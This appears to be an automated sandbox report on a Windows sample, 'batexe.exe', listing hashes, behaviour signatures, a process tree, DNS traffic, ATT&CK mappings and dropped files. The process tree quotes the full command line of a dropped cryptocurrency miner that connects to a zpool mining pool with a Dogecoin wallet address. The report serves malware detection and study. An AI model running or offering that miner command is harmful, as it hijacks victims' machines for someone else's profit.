73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Resubmissions

23/02/2024, 13:44 UTC

240223-q15f4sbe2x 7

23/02/2024, 13:12 UTC

240223-qfv2yaha39 7

Analysis

max time kernel
300s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 13:12 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1816	b2e.exe
4876	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4876	cpuminer-sse2.exe
4876	cpuminer-sse2.exe
4876	cpuminer-sse2.exe
4876	cpuminer-sse2.exe
4876	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1584-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 1816	1584	batexe.exe	89
PID 1584 wrote to memory of 1816	1584	batexe.exe	89
PID 1584 wrote to memory of 1816	1584	batexe.exe	89
PID 1816 wrote to memory of 2936	1816	b2e.exe	90
PID 1816 wrote to memory of 2936	1816	b2e.exe	90
PID 1816 wrote to memory of 2936	1816	b2e.exe	90
PID 2936 wrote to memory of 4876	2936	cmd.exe	93
PID 2936 wrote to memory of 4876	2936	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5D33.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4876

Network

DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

187.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.178.17.96.in-addr.arpa

IN PTR

Response

187.178.17.96.in-addr.arpa

IN PTR

a96-17-178-187deploystaticakamaitechnologiescom
DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR

Response

0.205.248.87.in-addr.arpa

IN PTR

https-87-248-205-0lgwllnwnet
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response
DNS

190.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.178.17.96.in-addr.arpa

IN PTR

Response

190.178.17.96.in-addr.arpa

IN PTR

a96-17-178-190deploystaticakamaitechnologiescom

10.127.0.1:12000

46 B
40 B
1
1
198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

8.3kB
9.6kB
85
88
127.0.0.1:50527

cpuminer-sse2.exe
127.0.0.1:50529

cpuminer-sse2.exe
20.44.10.122:443

8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

187.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

187.178.17.96.in-addr.arpa
8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

0.205.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

0.205.248.87.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa
8.8.8.8:53

190.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

190.178.17.96.in-addr.arpa
8.8.8.8:53

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe

Filesize
13.8MB

MD5
9d4c56e9576b45990064135945b365e9

SHA1
d56f97e78221a180681c800808723658b4346e92

SHA256
ed4fe235c15deacf2c09a4e3c89ae05b21badeaa849d1b80b56bc4ef1e7e9c35

SHA512
3acf3a9c9367f9719fd3bb701616ed1451ebebd122b3784ad97deba1c9c945b056a4a651ad53b90b441898f23027087411ae1aa8fa431a0847e1178245c5c891

Download Submit
C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe

Filesize
5.3MB

MD5
55f4d1ab3a493fb8888a704a6a3f56a1

SHA1
d3510b52f3b9ceaea3605d5df8b5875875491f18

SHA256
4b584fb2fb80a4c00d049dfe3233f1d05bb51692adda861d1ec5c45525c9f59d

SHA512
0b42c6b338a657bfd923162e7ec4cdb7d9a7f65348b461f6182e8b134443cf8538212b23e790c5238053d78c75441b4a0d3ba063a1a865176a750be654a6b018

Download Submit
C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe

Filesize
4.5MB

MD5
861cd6263e484eeb15e87d8050535204

SHA1
83dfd13f08f185b06ccaf25941bebbe38f8a4842

SHA256
e43d286e67d7d042bd6e74ec6c7707e94d0648e538ba9bc1283c4b9abc73e40d

SHA512
022c14121932b8660f327d250caa4d0b24053099dab2c721d7939f14f8906467164246064c00643b3f70285289d368b781d8bed1c27f484c11b458bd168b9c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5D33.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
8d9e20c13f0fdfa40219f839681ea376

SHA1
cdba61dd8fc2714f52458f75ebb513ae9637e4d5

SHA256
36ae04e4f6a963077a7cefad341bd1377c13babbf4a4693429b264a9e4bb3acb

SHA512
1a27ab5da0688bf60b80f6fde16157d5d17743c4cde734b245236f5b3f370b9adfe78676830ffaf71a7515c3d53b436d13481ba608e73bb3d6ed4b65108ae32f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
d61d5e12ed95d659634827f54bdfa62b

SHA1
f549af187c05e420e3c4e2d4be1bf89f102d176c

SHA256
ea6b005c69f38280e94ba0034175f3448ccd53910390f2214d26945cf3a50209

SHA512
0ea81cf059b55d09b4aecbdbe070e0d43256ebccad071bd0f3546610264d5511f8ace0c588a4c08343757afb6ed1e99942149523dadbf53504658ccd3b7235c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.6MB

MD5
384662d9963da800834bf8ff15409a7d

SHA1
c02c5932197d6cd3d9722f2d454138dafddb759f

SHA256
485bb4e29e26f1bd9450097b70c9d12d6160dc5505d8cb1a1e0733d84a5d2584

SHA512
23d48a79f361cd1b0c1f03ee31839c6e9b489bd890995d66e74ce4232cc264ba799f254baab85b02d8cad9e358547c8fca2731cfff4bbdb627af91002ad99da9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
930387eed0c094dc5a78627248df2cfc

SHA1
376caac0b5c96b7128a59e272fd4a4e0cd8f6edf

SHA256
037d2a4bc4afc56fa10257e46540226d2a4b4906aaa8caa5e3bb6250686461ee

SHA512
303f0d9f9a880ca0d57334f7d2b222959a67394908560a4c92a2acb3f96cb9208010fe88cd6cf87657bb39f2cbb488be9ebeca977c582938c4f8a713a0f47730

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
793KB

MD5
7e541e9d0a634314dba7954381d8f497

SHA1
c035195a06d746e42db530f377fca42fa380d972

SHA256
6f325b481a2a59188922aa5c9fecf209b0ee5fdb1aa7822b28969b96d739f78f

SHA512
22b8c30f78f42c50101fd747fa190a663356285c02d998bf7b9156915bfdd90571389ecea8f4e3fb0eaee301fe0fa30f89f122127b58bab50879baeaab0b2447

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1584-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1816-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1816-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4876-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4876-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4876-47-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/4876-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-46-0x000000005B4F0000-0x000000005B588000-memory.dmp

Filesize
608KB

Download
memory/4876-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.